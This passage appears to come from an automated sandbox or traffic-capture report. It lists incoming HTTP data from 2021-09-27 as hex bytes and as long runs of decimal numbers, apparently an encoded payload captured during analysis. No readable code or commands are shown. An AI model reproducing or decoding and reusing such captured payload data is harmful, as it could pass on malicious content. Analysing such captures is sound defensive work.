                                                                                              Data Ascii: 46 109 112 56 27 49 58 127 146 11 87 112 50 52 93 104 84 114 127 123 92 49 22 25 102 71 119 94 151 98 55 24 109 54 84 120 120 100 11 32 48 50 50 121 112 94 87 120 59 75 35 54 84 118 249 37 112 50 49 93 109 84 114 127 101 121 73 63 50 54 80 254 71 109 112
                                                                                              2021-09-27 18:27:26 UTC31INData Raw: 34 20 31 31 33 20 31 30 31 20 39 38 20 35 30 20 37 35 20 31 36 20 35 34 20 38 34 20 31 31 38 20 38 20 31 32 36 20 31 31 32 20 35 30 20 35 32 20 35 38 20 33 36 20 38 34 20 39 20 38 34 20 31 30 39 20 31 31 32 20 35 34 20 37 37 20 33 38 20 35 34 20 38 34 20 31 31 38 20 31 30 33 20 31 30 39 20 31 31 20 31 36 20 34 38 20 35 30 20 35 30 20 39 32 20 39 30 20 39 31 20 31 30 38 20 31 31 32 20 35 32 20 32 37 20 35 32 20 36 31 20 31 32 37 20 32 30 38 20 31 32 37 20 37 30 20 32 31 38 20 33 32 20 35 31 20 32 36 20 31 33 33 20 38 34 20 31 31 34 20 31 32 37 20 36 34 20 32 35 31 20 32 33 36 20 36 32 20 33 32 20 35 33 20 31 37 30 20 31 30 30 20 39 39 20 31 30 39 20 31 31 32 20 34 31 20 39 35 20 38 31 20 35 34 20 38 34 20 31 32 30 20 31 36 39 20 31 39 20 39 32 20 35 30 20
                                                                                              Data Ascii: 4 113 101 98 50 75 16 54 84 118 8 126 112 50 52 58 36 84 9 84 109 112 54 77 38 54 84 118 103 109 11 16 48 50 50 92 90 91 108 112 52 27 52 61 127 208 127 70 218 32 51 26 133 84 114 127 64 251 236 62 32 53 170 100 99 109 112 41 95 81 54 84 120 169 19 92 50
                                                                                              2021-09-27 18:27:26 UTC33INData Raw: 31 35 20 32 33 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 37 36 20 37 37 20 38 34 20 31 31 34 20 31 31 33 20 32 32 35 20 38 30 20 35 30 20 34 38 20 35 31 20 38 39 20 31 32 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 34 20 38 34 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 31 32 20 39 20 31 30 39 20 31 31 32 20 35 34 20 31 38 38 20 31 38 20 35 34 20 38 34 20 31 31 35 20 32 36 20 35 33 20 31 31 32 20 35 30 20 35 34 20 37 36 20 31 33 20 38 34 20 31 31 34 20 31 31 33 20 37 37 20 32 39 20 31 39 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 37 39 20 34 38 20 35 30 20 35 30 20 35 39 20 34 32 20 31 31 37 20
                                                                                              Data Ascii: 15 23 132 108 93 146 112 50 54 76 77 84 114 113 225 80 50 48 51 89 12 114 117 107 14 9 48 50 50 116 4 84 189 110 26 207 50 54 82 12 9 109 112 54 188 18 54 84 115 26 53 112 50 54 76 13 84 114 113 77 29 19 224 44 30 171 114 117 107 14 79 48 50 50 59 42 117
                                                                                              2021-09-27 18:27:26 UTC34INData Raw: 35 33 20 31 31 34 20 31 31 37 20 31 30 33 20 31 37 34 20 35 30 20 32 36 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 39 38 20 35 30 20 39 39 20 38 37 20 35 34 20 37 34 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 35 32 20 35 34 20 38 35 20 31 31 35 20 31 31 37 20 31 30 39 20 39 34 20 35 30 20 34 38 20 33 35 20 33 30 20 35 38 20 31 31 34 20 31 31 37 20 31 30 37 20 31 30 32 20 33 30 20 35 37 20 32 30 20 34 39 20 31 30 39 20 31 33 30 20 31 31 37 20 31 30 39 20 31 31 32 20 32 35 20 35 31 20 35 37 20 32 39 20 31 36 31 20 31 31 37 20 36 20 31 37 30 20 31 31 32 20 35 30 20 35 38 20 34 33 20 31 32 20 31 33 33 20 31 31 34 20 31 31 37 20 31 30 39 20 38 36 20 33 35 20 35 33 20 36 35 20 32 35 34 20 38 34 20 31 31 34 20 31 32 37
                                                                                              Data Ascii: 53 114 117 103 174 50 26 51 38 84 114 117 109 98 50 99 87 54 74 52 117 109 113 33 0 52 54 85 115 117 109 94 50 48 35 30 58 114 117 107 102 30 57 20 49 109 130 117 109 112 25 51 57 29 161 117 6 170 112 50 58 43 12 133 114 117 109 86 35 53 65 254 84 114 127
                                                                                              2021-09-27 18:27:27 UTC35INData Raw: 35 34 20 39 34 20 31 31 36 20 31 30 39 20 35 33 20 31 32 32 20 35 32 20 35 37 20 33 20 31 35 37 20 31 32 36 20 39 37 20 36 39 20 31 30 34 20 31 31 32 20 32 33 35 20 34 38 20 35 30 20 35 34 20 31 30 30 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 34 20 31 38 38 20 31 33 35 20 33 36 20 35 20 38 35 20 38 38 20 31 31 39 20 31 32 33 20 32 33 34 20 37 35 20 32 20 35 30 20 35 34 20 38 35 20 33 20 37 31 20 31 30 39 20 31 31 32 20 35 31 20 33 38 20 33 30 20 33 30 20 31 31 34 20 31 31 32 20 39 38 20 32 34 37 20 34 20 35 36 20 34 38 20 35 30 20 34 35 20 37 34 20 39 35 20 38 36 20 37 35 20 31 34 20 35 20 34 38 20 35 30 20 35 30 20 31 32 34 20 31 38 20 31 31 36 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 34 36 20 31 36 20 37 36 20 31 31 32 20 32 35 31 20 32 31 38 20
                                                                                              Data Ascii: 54 94 116 109 53 122 52 57 3 157 126 97 69 104 112 235 48 50 54 100 114 117 124 114 188 135 36 5 85 88 119 123 234 75 2 50 54 85 3 71 109 112 51 38 30 30 114 112 98 247 4 56 48 50 45 74 95 86 75 14 5 48 50 50 124 18 116 109 118 43 29 46 16 76 112 251 218
                                                                                              2021-09-27 18:27:27 UTC37INData Raw: 38 20 38 34 20 31 31 36 20 39 35 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 32 20 35 34 20 39 38 20 31 31 34 20 31 31 37 20 31 30 39 20 36 36 20 35 30 20 34 38 20 33 35 20 33 36 20 38 35 20 31 31 32 20 31 31 30 20 31 32 32 20 39 33 20 32 37 20 32 32 20 32 32 36 20 31 38 37 20 38 34 20 31 31 34 20 31 31 36 20 36 39 20 35 34 20 35 30 20 34 38 20 35 36 20 33 32 20 35 39 20 31 36 32 20 31 31 37 20 31 30 39 20 31 32 32 20 33 36 20 31 37 30 20 37 30 20 31 38 37 20 38 34 20 31 31 34 20 31 31 36 20 32 20 31 36 31 20 35 30 20 34 38 20 35 36 20 33 30 20 31 33 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 39 20 34 33 20 34 35 20 33 31 20 35 31 20 31 31 34 20 38 38 20 38 33 20 37 30 20 31 36 35 20 32 30 20 32 37 20 32 30 33 20 35 34 20 38 34 20 39 37 20 36 39 20
                                                                                              Data Ascii: 8 84 116 95 109 112 33 0 52 54 98 114 117 109 66 50 48 35 36 85 112 110 122 93 27 22 226 187 84 114 116 69 54 50 48 56 32 59 162 117 109 122 36 170 70 187 84 114 116 2 161 50 48 56 30 134 114 117 103 119 43 45 31 51 114 88 83 70 165 20 27 203 54 84 97 69
                                                                                              2021-09-27 18:27:27 UTC38INData Raw: 30 20 31 37 31 20 31 30 39 20 31 31 32 20 35 36 20 35 35 20 31 38 20 32 30 34 20 38 34 20 31 31 34 20 31 31 37 20 35 33 20 31 32 33 20 35 33 20 35 36 20 33 20 31 34 32 20 31 32 34 20 32 35 30 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 31 32 36 20 32 36 20 31 31 39 20 38 35 20 31 31 34 20 31 31 35 20 31 32 33 20 39 34 20 35 36 20 32 34 20 31 31 35 20 35 35 20 38 34 20 31 31 36 20 39 33 20 31 37 39 20 31 31 32 20 35 30 20 35 38 20 32 34 20 31 32 30 20 31 32 34 20 37 33 20 31 31 36 20 31 30 39 20 31 31 38 20 33 31 20 34 39 20 32 34 20 33 30 20 31 33 39 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 38 32 20 34 38 20 35 30 20 34 38 20 31 32 36 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 36 36 20 34 38 20 35 30 20 35 34 20 39 38 20 31 31 34 20 31
                                                                                              Data Ascii: 0 171 109 112 56 55 18 204 84 114 117 53 123 53 56 3 142 124 250 117 109 118 24 126 26 119 85 114 115 123 94 56 24 115 55 84 116 93 179 112 50 58 24 120 124 73 116 109 118 31 49 24 30 139 114 117 103 88 182 48 50 48 126 105 69 110 112 66 48 50 54 98 114 1
                                                                                              2021-09-27 18:27:27 UTC39INData Raw: 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 31 33 39 20 31 31 34 20 31 31 37 20 31 30 33 20 33 31 20 32 31 38 20 34 38 20 35 30 20 36 30 20 37 33 20 39 35 20 39 36 20 37 35 20 31 34 20 37 37 20 34 38 20 35 30 20 35 30 20 39 32 20 38 32 20 31 30 31 20 37 34 20 31 31 32 20 35 30 20 32 34 20 31 39 31 20 35 34 20 38 34 20 31 31 36 20 38 39 20 39 38 20 39 31 20 34 39 20 36 30 20 32 35 20 32 32 33 20 31 32 34 20 31 37 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 31 37 39 20 35 30 20 35 34 20 38 32 20 39 30 20 36 36 20 31 30 38 20 31 31 32 20 35 32 20 39 20 31 38 32 20 35 34 20 38 34 20 31 31 34 20 31 31 34 20 37 37 20 31 36 33 20 31 37 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37
                                                                                              Data Ascii: 9 162 107 69 143 50 48 52 30 139 114 117 103 31 218 48 50 60 73 95 96 75 14 77 48 50 50 92 82 101 74 112 50 24 191 54 84 116 89 98 91 49 60 25 223 124 173 117 109 122 26 179 50 54 82 90 66 108 112 52 9 182 54 84 114 114 77 163 17 224 44 30 171 114 117 107
                                                                                              2021-09-27 18:27:27 UTC41INData Raw: 20 34 38 20 35 30 20 36 30 20 36 37 20 31 34 30 20 31 31 36 20 37 31 20 31 31 32 20 35 30 20 33 35 20 32 20 35 33 20 38 34 20 38 34 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 20 34 38 20 35 30 20 33 39 20 31 32 34 20 31 35 20 31 31 37 20 31 30 39 20 31 31 38 20 33 31 20 35 30 20 33 37 20 32 38 20 31 32 34 20 31 33 30 20 31 31 37 20 31 30 39 20 31 32 32 20 36 35 20 31 39 33 20 35 30 20 35 34 20 39 34 20 31 30 37 20 38 38 20 39 36 20 38 36 20 35 33 20 31 36 20 31 38 20 35 32 20 38 34 20 31 31 34 20 32 36 20 31 35 39 20 31 31 32 20 35 30 20 35 38 20 32 34 20 36 31 20 31 32 37 20 31 33 31 20 31 31 37 20 31 30 39 20 39 39 20 32 20 35 31 20 35 30 20 31 32 20 38 34 20 31 31 34 20 31 31 37 20 38 37 20 31 31 32 20 35 30 20 33 33 20 31 38 20 31 34 37 20 31 31 39
                                                                                              Data Ascii: 48 50 60 67 140 116 71 112 50 35 2 53 84 84 117 109 112 11 48 50 39 124 15 117 109 118 31 50 37 28 124 130 117 109 122 65 193 50 54 94 107 88 96 86 53 16 18 52 84 114 26 159 112 50 58 24 61 127 131 117 109 99 2 51 50 12 84 114 117 87 112 50 33 18 147 119
                                                                                              2021-09-27 18:27:27 UTC42INData Raw: 31 32 20 35 31 20 34 33 20 32 20 35 33 20 38 34 20 33 30 20 31 31 37 20 31 30 39 20 31 31 32 20 31 35 20 34 38 20 35 30 20 33 39 20 34 32 20 31 35 20 31 31 37 20 31 30 39 20 31 31 36 20 31 38 20 32 32 34 20 32 32 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 31 35 34 20 35 34 20 38 34 20 31 32 30 20 31 30 34 20 36 34 20 31 32 33 20 32 30 20 35 35 20 32 36 20 31 35 32 20 38 34 20 31 31 34 20 31 32 37 20 36 34 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31 36 37 20 31 30 32 20 39 35 20 31 30 36 20 38 38 20 32 30 31 20 34 38 20 35 30 20 36 30 20 37 37 20 39 35 20 31 32 36 20 37 35 20 31 32 30 20 32 36 20 31 35 38 20 35 30 20 35 34 20 39 34 20 39 34 20 31 32 32 20 37 30 20 31 31 35 20 36 32 20 32 37 20 31 39 33
                                                                                              Data Ascii: 12 51 43 2 53 84 30 117 109 112 15 48 50 39 42 15 117 109 116 18 224 22 230 74 90 138 109 112 52 24 154 54 84 120 104 64 123 20 55 26 152 84 114 127 64 119 25 51 57 29 167 102 95 106 88 201 48 50 60 77 95 126 75 120 26 158 50 54 94 94 122 70 115 62 27 193
                                                                                              2021-09-27 18:27:27 UTC43INData Raw: 32 30 20 32 34 20 31 32 37 20 35 35 20 38 34 20 31 31 36 20 31 30 33 20 31 31 31 20 38 38 20 32 30 34 20 34 38 20 35 30 20 36 30 20 31 32 30 20 31 32 35 20 39 34 20 31 30 37 20 31 32 34 20 32 35 20 32 31 32 20 36 33 20 32 39 20 31 39 30 20 31 32 33 20 31 32 35 20 32 20 31 34 33 20 35 30 20 34 38 20 35 36 20 33 30 20 32 36 20 31 31 35 20 31 31 37 20 31 30 37 20 39 38 20 34 38 20 32 34 20 32 30 34 20 35 34 20 38 34 20 31 32 30 20 38 39 20 31 30 36 20 31 32 31 20 35 38 20 39 35 20 32 30 35 20 35 34 20 38 34 20 31 32 30 20 31 31 35 20 31 30 30 20 33 31 20 35 30 20 34 39 20 35 30 20 36 30 20 35 39 20 32 33 31 20 31 31 36 20 31 30 39 20 31 31 38 20 35 32 20 32 36 20 35 30 20 35 34 20 38 34 20 31 30 35 20 36 39 20 31 30 34 20 31 31 32 20 31 39 30 20 34 38 20 35
                                                                                              Data Ascii: 20 24 127 55 84 116 103 111 88 204 48 50 60 120 125 94 107 124 25 212 63 29 190 123 125 2 143 50 48 56 30 26 115 117 107 98 48 24 204 54 84 120 89 106 121 58 95 205 54 84 120 115 100 31 50 49 50 60 59 231 116 109 118 52 26 50 54 84 105 69 104 112 190 48 5
                                                                                              2021-09-27 18:27:27 UTC45INData Raw: 36 37 20 33 38 20 32 34 20 31 30 30 20 35 35 20 38 34 20 31 31 36 20 31 30 37 20 36 34 20 31 32 31 20 32 30 20 33 38 20 32 36 20 31 37 36 20 38 34 20 31 31 34 20 31 31 35 20 37 30 20 31 31 35 20 32 30 20 32 37 20 31 39 39 20 32 38 20 38 34 20 31 38 30 20 31 31 20 33 37 20 31 31 32 20 35 30 20 35 32 20 33 36 20 39 32 20 31 30 33 20 31 31 35 20 39 35 20 31 38 20 35 36 20 35 30 20 34 38 20 35 34 20 33 30 20 38 32 20 31 31 35 20 31 31 37 20 31 30 33 20 31 30 32 20 38 38 20 33 20 34 32 20 33 30 20 31 30 34 20 31 31 35 20 31 31 37 20 31 30 37 20 39 32 20 35 35 20 32 34 20 37 34 20 35 34 20 38 34 20 31 31 36 20 39 33 20 38 30 20 31 31 33 20 35 30 20 35 34 20 33 30 20 35 31 20 31 32 34 20 31 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 34 38 20 35 30 20 34
                                                                                              Data Ascii: 67 38 24 100 55 84 116 107 64 121 20 38 26 176 84 114 115 70 115 20 27 199 28 84 180 11 37 112 50 52 36 92 103 115 95 18 56 50 48 54 30 82 115 117 103 102 88 3 42 30 104 115 117 107 92 55 24 74 54 84 116 93 80 113 50 54 30 51 124 11 117 109 118 24 48 50 4
                                                                                              2021-09-27 18:27:27 UTC46INData Raw: 31 36 20 31 31 38 20 36 34 20 34 39 20 34 38 20 37 33 20 35 34 20 38 34 20 31 31 34 20 35 35 20 31 30 39 20 31 31 32 20 33 35 20 31 36 20 31 38 39 20 31 39 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 34 38 20 33 30 20 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 32 20 33 30 20 32 37 20 32 30 20 32 32 20 31 32 38 20 38 37 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 38 33 20 39 30 20 32 32 39 20 31 30 39 20 31 31 32 20 35 32 20 34 36 20 33 31 20 34 34 20 31 31 34 20 31 32 32 20 39 33 20 31 33 37 20 31 31 32 20 35 30 20 35 38 20 34 36 20 32 37 20 37 31 20 38 34 20 31 30 30 20 31 30 35 20 31 31 35 20 39 33 20 35 36 20 35 31 20 35 34 20 39 34 20 39 34 20 39 38 20 37 30 20 31 32 32 20 35 37 20
                                                                                              Data Ascii: 16 118 64 49 48 73 54 84 114 55 109 112 35 16 189 19 132 108 93 146 112 50 54 48 30 8 114 117 103 102 30 27 20 22 128 87 165 115 88 205 48 50 48 83 90 229 109 112 52 46 31 44 114 122 93 137 112 50 58 46 27 71 84 100 105 115 93 56 51 54 94 94 98 70 122 57
                                                                                              2021-09-27 18:27:27 UTC47INData Raw: 34 20 31 31 20 39 32 20 31 31 32 20 35 30 20 35 32 20 32 36 20 33 38 20 38 35 20 31 31 34 20 31 32 37 20 36 39 20 31 33 33 20 35 30 20 34 38 20 35 36 20 31 36 20 34 32 20 36 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 36 20 31 36 31 20 35 30 20 35 34 20 38 32 20 39 35 20 31 30 38 20 31 39 20 36 35 20 35 30 20 34 38 20 35 34 20 33 30 20 39 34 20 31 31 35 20 31 31 37 20 31 30 33 20 38 38 20 32 33 37 20 34 38 20 35 30 20 36 30 20 34 32 20 36 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 36 20 33 33 20 35 31 20 35 34 20 39 34 20 31 32 20 31 30 33 20 31 30 38 20 31 31 32 20 35 36 20 37 38 20 32 39 20 35 34 20 38 34 20 31 31 38 20 39 38 20 32 20 31 35 37 20 35 30 20 34 38 20 35 36 20 34 34 20 31 32 31 20 39 37 20 38 33 20 31 30 37 20 31 34 20 37 37 20 34 38 20
                                                                                              Data Ascii: 4 11 92 112 50 52 26 38 85 114 127 69 133 50 48 56 16 42 67 117 109 116 26 161 50 54 82 95 108 19 65 50 48 54 30 94 115 117 103 88 237 48 50 60 42 67 117 109 116 26 33 51 54 94 12 103 108 112 56 78 29 54 84 118 98 2 157 50 48 56 44 121 97 83 107 14 77 48
                                                                                              2021-09-27 18:27:27 UTC49INData Raw: 31 31 32 20 35 36 20 37 38 20 32 32 32 20 35 34 20 38 34 20 31 32 30 20 31 31 20 36 36 20 31 31 32 20 35 30 20 35 32 20 33 37 20 38 39 20 31 38 35 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 37 20 33 31 20 34 30 20 32 30 20 34 38 20 34 32 20 31 33 20 31 31 37 20 31 30 39 20 31 31 36 20 37 36 20 30 20 35 30 20 35 34 20 38 30 20 32 39 20 31 30 32 20 31 30 38 20 31 31 32 20 35 36 20 32 34 20 31 36 31 20 35 34 20 38 34 20 31 31 36 20 31 37 31 20 37 34 20 31 32 32 20 32 35 20 32 31 34 20 32 33 20 33 30 20 32 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 37 20 33 31 20 34 30 20 32 30 20 34 39 20 31 31 36 20 31 32 33 20 38 30 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 31 39 33 20 31 30 39 20 31 31 32 20 35 32 20 32 34
                                                                                              Data Ascii: 112 56 78 222 54 84 120 11 66 112 50 52 37 89 185 114 117 103 107 31 40 20 48 42 13 117 109 116 76 0 50 54 80 29 102 108 112 56 24 161 54 84 116 171 74 122 25 214 23 30 24 114 117 103 107 31 40 20 49 116 123 80 189 110 26 207 50 54 82 90 193 109 112 52 24
                                                                                              2021-09-27 18:27:27 UTC50INData Raw: 20 31 31 35 20 36 39 20 31 37 20 35 30 20 34 38 20 35 36 20 32 33 32 20 38 34 20 31 30 30 20 39 35 20 31 30 37 20 39 30 20 37 36 20 30 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 32 30 20 31 32 32 20 35 34 20 37 34 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 34 39 20 30 20 35 36 20 35 34 20 37 37 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 33 20 37 39 20 31 31 31 20 38 38 20 31 32 34 20 38 36 20 39 33 20 33 38 20 35 31 20 35 34 20 39 34 20 36 20 35 31 20 31 30 39 20 31 31 32 20 35 31 20 32 34 20 31 37 31 20 35 34 20 38 34 20 31 31 36 20 39 35 20 37 35 20 39 31 20 32 32 33 20 34 38 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 37 20 31 30 39 20 31 30 30 20 35 30 20 34 38
                                                                                              Data Ascii: 115 69 17 50 48 56 232 84 100 95 107 90 76 0 51 38 84 114 117 109 112 50 120 122 54 74 52 117 109 113 49 0 56 54 77 114 117 109 112 50 48 50 53 79 111 88 124 86 93 38 51 54 94 6 51 109 112 51 24 171 54 84 116 95 75 91 223 48 50 54 87 66 127 109 100 50 48
                                                                                              2021-09-27 18:27:27 UTC52INData Raw: 31 37 31 20 31 30 39 20 39 30 20 34 39 20 36 30 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 35 20 31 38 37 20 35 34 20 38 38 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 35 34 20 35 34 20 32 34 20 31 31 34 20 31 31 37 20 31 30 39 20 35 37 20 35 30 20 34 38 20 33 35 20 37 32 20 34 32 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 34 20 31 38 20 31 36 31 20 32 30 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 32 31 39 20 35 34 20 38 34 20 31 32 30 20 39 33 20 31 39 37 20 31 31 32 20 35 30 20 35 38 20 34 30 20 32 37 20 39 35 20 38 34 20 31 31 35 20 36 39 20 32 32 32 20 35 30 20 34 38 20 35 36 20 32 37 20 39 35 20 38 39 20 31 31 38 20 31 30 33 20 39 31 20
                                                                                              Data Ascii: 171 109 90 49 60 51 38 84 114 117 109 112 50 185 187 54 88 52 117 109 113 33 0 54 54 24 114 117 109 57 50 48 35 72 42 114 117 105 114 18 161 20 230 74 90 138 109 112 52 24 219 54 84 120 93 197 112 50 58 40 27 95 84 115 69 222 50 48 56 27 95 89 118 103 91
                                                                                              2021-09-27 18:27:27 UTC53INData Raw: 31 20 33 38 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 30 30 20 35 30 20 31 38 39 20 31 34 37 20 35 34 20 38 33 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 31 20 30 20 35 34 20 35 34 20 32 34 37 20 31 31 34 20 31 31 37 20 31 30 39 20 35 39 20 35 30 20 34 38 20 33 35 20 37 32 20 33 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 35 20 33 31 20 35 37 20 32 30 20 36 32 20 31 32 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 35 20 35 31 20 36 32 20 32 39 20 31 36 31 20 31 31 32 20 39 33 20 32 34 20 31 31 32 20 35 30 20 35 38 20 33 30 20 35 31 20 31 33 37 20 32 34 33 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 31 36 20 31 31 33 20 31 36 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 37 36 20 37 33
                                                                                              Data Ascii: 1 38 84 114 119 109 100 50 189 147 54 83 114 117 109 112 41 0 54 54 247 114 117 109 59 50 48 35 72 30 114 117 105 105 31 57 20 62 124 251 117 109 122 25 51 62 29 161 112 93 24 112 50 58 30 51 137 243 117 109 112 48 16 113 16 132 108 93 146 112 50 54 76 73
                                                                                              2021-09-27 18:27:27 UTC54INData Raw: 35 30 20 35 34 20 39 34 20 31 37 32 20 31 31 38 20 31 30 32 20 39 31 20 32 31 30 20 33 34 20 34 38 20 33 30 20 35 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 33 20 31 35 31 20 32 33 38 20 36 30 20 33 36 20 38 36 20 31 34 30 20 39 39 20 39 39 20 31 31 32 20 35 30 20 34 33 20 39 33 20 38 35 20 38 34 20 31 31 34 20 31 32 37 20 31 37 37 20 39 30 20 35 30 20 34 39 20 34 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 38 38 20 31 31 32 20 36 30 20 31 31 35 20 35 30 20 32 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 34 20 35 30 20 35 36 20 35 30 20 37 30 20 34 34 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 31 20 36 20 38 30 20 31 31 34 20 32 33 36 20 31 30 39 20 31 31 32 20 35 30 20 31 32 35 20 35 30 20 35 34 20 36 39 20
                                                                                              Data Ascii: 50 54 94 172 118 102 91 210 34 48 30 54 114 117 103 93 151 238 60 36 86 140 99 99 112 50 43 93 85 84 114 127 177 90 50 49 46 54 84 114 117 88 112 60 115 50 28 18 114 117 108 114 50 56 50 70 44 114 123 109 112 50 48 41 6 80 114 236 109 112 50 125 50 54 69
                                                                                              2021-09-27 18:27:27 UTC58INData Raw: 20 31 31 34 20 31 31 35 20 33 30 20 31 35 34 20 35 30 20 34 38 20 35 36 20 33 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 38 36 20 32 34 20 31 37 38 20 35 30 20 35 35 20 36 38 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 34 20 34 38 20 32 36 20 38 32 20 38 34 20 31 31 37 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 33 20 32 20 35 30 20 38 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 31 32 20 31 32 37 20 34 38 20 35 30 20 33 39 20 34 32 20 37 32 20 31 31 37 20 31 30 39 20 31 31 36 20 31 31 20 37 38 20 35 30 20 35 34 20 38 34 20 31 32 20 37 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 30 38 20 35 34 20 38 34 20 31 32 30 20 39 36 20 36 34 20 31 31 35 20 32 30 20 32 37 20 31 30 33 20 35 38 20 31 32 37 20 31 33 37 20 31 30 33 20
                                                                                              Data Ascii: 114 115 30 154 50 48 56 30 191 114 117 103 86 24 178 50 55 68 114 117 111 112 14 48 26 82 84 117 117 109 112 50 43 2 50 84 251 117 109 112 127 48 50 39 42 72 117 109 116 11 78 50 54 84 12 79 109 112 54 95 108 54 84 120 96 64 115 20 27 103 58 127 137 103
                                                                                              2021-09-27 18:27:27 UTC62INData Raw: 36 39 20 31 39 37 20 35 30 20 34 38 20 35 32 20 37 32 20 34 33 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 33 35 20 34 38 20 35 30 20 34 38 20 31 32 36 20 38 34 20 39 34 20 32 31 31 20 38 36 20 32 35 20 32 32 39 20 32 30 20 32 39 20 31 33 37 20 31 31 34 20 31 31 37 20 31 32 36 20 36 34 20 34 39 20 34 38 20 31 39 37 20 35 34 20 38 34 20 31 31 34 20 33 32 20 31 30 39 20 31 31 32 20 33 35 20 37 38 20 31 31 35 20 35 34 20 38 34 20 31 31 38 20 38 38 20 31 30 33 20 31 34 20 31 31 34 20 34 38 20 35 30 20 35 30 20 31 30 39 20 31 35 31 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 39 35 20 32 20 35 35 20 38 34 20 31 32 30 20 31 31 30 20 36 34 20 38 32 20 32 30 20 37 39 20 31 32 20 35 34 20 38 34 20 31 31 38 20 39 33 20 39 32 20 31 31 33 20 35 30 20 35 38
                                                                                              Data Ascii: 69 197 50 48 52 72 43 114 117 103 88 135 48 50 48 126 84 94 211 86 25 229 20 29 137 114 117 126 64 49 48 197 54 84 114 32 109 112 35 78 115 54 84 118 88 103 14 114 48 50 50 109 151 117 109 112 48 95 2 55 84 120 110 64 82 20 79 12 54 84 118 93 92 113 50 58
                                                                                              2021-09-27 18:27:27 UTC63INData Raw: 33 20 38 34 20 31 31 39 20 31 30 37 20 33 31 20 31 34 37 20 34 39 20 35 30 20 34 38 20 31 32 36 20 31 32 30 20 39 34 20 31 35 32 20 31 31 32 20 35 30 20 33 35 20 32 20 34 38 20 38 34 20 31 30 35 20 31 31 37 20 31 30 39 20 31 31 32 20 31 30 31 20 34 38 20 35 30 20 33 39 20 38 37 20 31 31 38 20 31 31 32 20 39 39 20 31 31 36 20 36 30 20 35 33 20 32 36 20 32 36 20 38 35 20 31 31 34 20 31 31 35 20 31 31 36 20 39 33 20 35 39 20 32 32 20 34 38 20 34 38 20 35 39 20 32 31 31 20 31 31 36 20 31 30 39 20 31 31 38 20 32 34 20 35 38 20 32 35 20 31 39 35 20 38 34 20 39 37 20 36 39 20 31 30 37 20 31 31 32 20 35 20 34 38 20 35 30 20 35 34 20 36 37 20 31 31 34 20 31 31 37 20 31 32 34 20 31 30 30 20 33 37 20 32 39 20 33 34 20 31 36 20 34 32 20 37 35 20 31 31 37 20 31 30 39
                                                                                              Data Ascii: 3 84 119 107 31 147 49 50 48 126 120 94 152 112 50 35 2 48 84 105 117 109 112 101 48 50 39 87 118 112 99 116 60 53 26 26 85 114 115 116 93 59 22 48 48 59 211 116 109 118 24 58 25 195 84 97 69 107 112 5 48 50 54 67 114 117 124 100 37 29 34 16 42 75 117 109
